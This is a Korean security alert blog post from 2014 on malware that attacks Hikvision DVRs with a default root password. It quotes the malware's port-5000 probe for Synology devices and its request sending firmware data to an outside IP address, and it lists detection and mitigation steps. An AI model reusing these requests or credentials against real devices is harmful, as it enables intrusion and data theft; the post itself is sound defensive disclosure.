2014년 4월 1일 화요일

[SecurityPlus Alert] 5000번 포트스캐닝 - Hikvision DVR 시스템 노린 악성코드 주의

[SecurityPlus Alert] 5000번 포트스캐닝 - Hikvision DVR 시스템 노린 악성코드 주의

1. 분석 보고
   - 리눅스 시스템 기반 Hikvision DVR 시스템에 대해 공격하는 악성코드로 해당 악성코드에 침해당한 시스템 상의 /dev/cmd.so에 위치.
   - 공격 받은 취약한 Hikvision DVR 시스템의 경우, 외부로 telnet 포트가 오픈되어 있으며, 기본 Root 패스워드(12345) 사용.
   - 악성코드는 ARM binary로 되어 있으며, Synology 디바이스를 찾기 위해 다음과 같은 5000번 포트 스캐닝 수행.

 GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

   - 포트 스캔 결과 응답이 있으면 firmware 정보를 다음과 같이 162.219.57.8로 전송

 GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close

   - 위와 같이 포트 스캐닝을 통해 취약한 디바이스 탐지 후, 공격 수행.


2. 대응 조치
   - 사용 Hikvision DVR에 대해 피해 여부 확인
     (1) /dev/cmd.so 파일 존재 여부 확인
     (2) 162.219.57.8 접속 로그 확인
     (3) /webman/info.cgi?host, /k.php?h=%lu 웹 로그 존재 여부 확인
   - 만일 아직 피해를 입지 않았다면,
     (1) 취약하지 않은 버젼으로 Firmware 및 관련 소프트웨어 업그레이드
     (2) 기본 Root 패스워드 변경
     (3) 불필요하게 외부 오픈된 Telnet 혹은 SSH 포트 차단